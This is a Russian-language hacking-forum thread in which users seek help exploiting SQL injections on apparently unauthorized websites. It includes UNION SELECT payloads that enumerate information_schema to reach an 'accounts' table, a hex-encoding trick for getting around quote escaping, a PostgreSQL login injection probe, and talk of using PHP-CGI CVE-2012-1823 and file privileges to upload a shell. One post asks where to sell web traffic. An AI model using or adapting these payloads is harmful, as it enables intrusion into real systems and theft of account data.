23.04.2013, 20:27
|
|
Новичок
Регистрация: 19.04.2013
Сообщений: 15
С нами:
6877046
Репутация:
0
|
|
Имеется MySQL5 инъекция, мускул крутится на Win server 2008. Веб сервак - 80/tcp open http Microsoft IIS httpd 7.0.
file_priv=y, но кавычки не пролазят.
PHP - 5.2.17 (старый)
В нем есть этот баг: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0831
Тоесть можно отключить MQ? Если да - можно попробовать записать файл.
Есть варианты залится?
Еще удалось прочитать исходник:
admin/index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR]
[/COLOR]" />
[/COLOR]styles.css" media="screen" />
[/COLOR]1x1.gif" width='1px' height='300px'>
Project Manager
[/COLOR]index.php' method="POST">
User:
Password:
[COLOR="#0000BB"][/COLOR][/COLOR]
Мне почему-то кажется, что он уязвим, не?
И ещё туда же:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823
5.2.17 - уязвим.
Сообщение от None
when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
в phpinfo()
Сообщение от None
Server API CGI/FastCGI
index.php?-s ничего не изменило. вай?
Спасибо. |
|
|
23.04.2013, 22:28
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Dr.D0z1k - например, пропатчено =/
|
|
|
|
24.04.2013, 08:47
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Подскажите на какую партнёрку лучше сливать траф?Можна в личку.
|
|
|
|
24.04.2013, 11:12
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Sat-hacker
Подскажите на какую партнёрку лучше сливать траф?Можна в личку.
этот вопрос не имеет никакого отношения к теме
|
|
|
|
24.04.2013, 11:46
|
|
Новичок
Регистрация: 07.01.2013
Сообщений: 19
С нами:
7023926
Репутация:
5
|
|
есть инъекция
так работает нормально
?menu=95&add=50110339+and+1=0+union+select+1,table _name,3,4,5,6,7,8+from+information_schema.tables+--+
названия таблиц выводятся в столбик, есть таблица accounts,но я не могу вывести названия столбцов. Вывод ошибки тут отсутствует
пробовал так:
?menu=95&add=50110339+and+1=0+union+select+1,colum n_name,3,4,5,6,7,8+from+information_schema.columns +where+table_name='accounts'+--+
не выходит
а так выводится огромное кол-во столбцов:
?menu=95&add=50110339+and+1=0+union+select+1,colum n_name,3,4,5,6,7,8+from+information_schema.columns +--+
как мне вывести именно accounts?
пробовал в hex переводить, кавычки ставить/убирать, не получается
|
|
|
|
24.04.2013, 12:31
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от LomasterII
есть инъекция
так работает нормально
?menu=95&add=50110339+and+1=0+union+select+1,table _name,3,4,5,6,7,8+from+information_schema.tables+--+
названия таблиц выводятся в столбик, есть таблица accounts,но я не могу вывести названия столбцов. Вывод ошибки тут отсутствует
пробовал так:
?menu=95&add=50110339+and+1=0+union+select+1,colum n_name,3,4,5,6,7,8+from+information_schema.columns +where+table_name='accounts'+--+
не выходит
а так выводится огромное кол-во столбцов:
?menu=95&add=50110339+and+1=0+union+select+1,colum n_name,3,4,5,6,7,8+from+information_schema.columns +--+
как мне вывести именно accounts?
пробовал в hex переводить, кавычки ставить/убирать, не получается
Скорее всего у вас MQ включены.
Следовательно, надо использовать запросы вида
menu=95&add=50110339+and+1=0+union+select+1,column _name,3,4,5,6,7,8+from+information_schema.columns+ where+table_name=0x6163636f756e7473+--+
|
|
|
|
24.04.2013, 12:35
|
|
Новичок
Регистрация: 07.01.2013
Сообщений: 19
С нами:
7023926
Репутация:
5
|
|
Спасибо!
|
|
|
|
24.04.2013, 20:17
|
|
Познающий
Регистрация: 26.09.2011
Сообщений: 64
С нами:
7699286
Репутация:
39
|
|
Люди помогите раскрутить или подскажите в какую сторону крутить postgresql , при post запросе :
login=1%27%22
выкидывает ошибку :
Warning: pg_query() [function.pg-query]: Query failed: ÎØÈÁÊÀ: îøèáêà ñèíòàêñèñà (ïðèìåðíîå ïîëîæåíèå: "\"
LINE 1: ...SR_PASS" FROM main."RTH_WEBUSRS" WHERE "WEBUSR_NAME"='1\'\"'
^ in C:\Program Files (x86)\Apache Software Foundation\Apache2.2\htdocs\ххх\login.php on line 25
а дальше не получается ничего
|
|
|
|
25.04.2013, 18:51
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
такой вопросец, есть скуля, выводит только числовой резултат, если в выводе есть буквы или знаки то показывает ошибку, нехочется пол дня крутить как блинд, может есть каккие ни будь функции в mysql чтобы перевести строку в числовой вид(например ascii() толтко не символ а всю строку нужно )
чтобы потом можно было легко переобразовать обратно?
|
|
|
|
25.04.2013, 20:18
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
Сообщение от qaz
такой вопросец, есть скуля, выводит только числовой резултат, если в выводе есть буквы или знаки то показывает ошибку, нехочется пол дня крутить как блинд, может есть каккие ни будь функции в mysql чтобы перевести строку в числовой вид(например ascii() толтко не символ а всю строку нужно )
чтобы потом можно было легко переобразовать обратно?
Char не?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
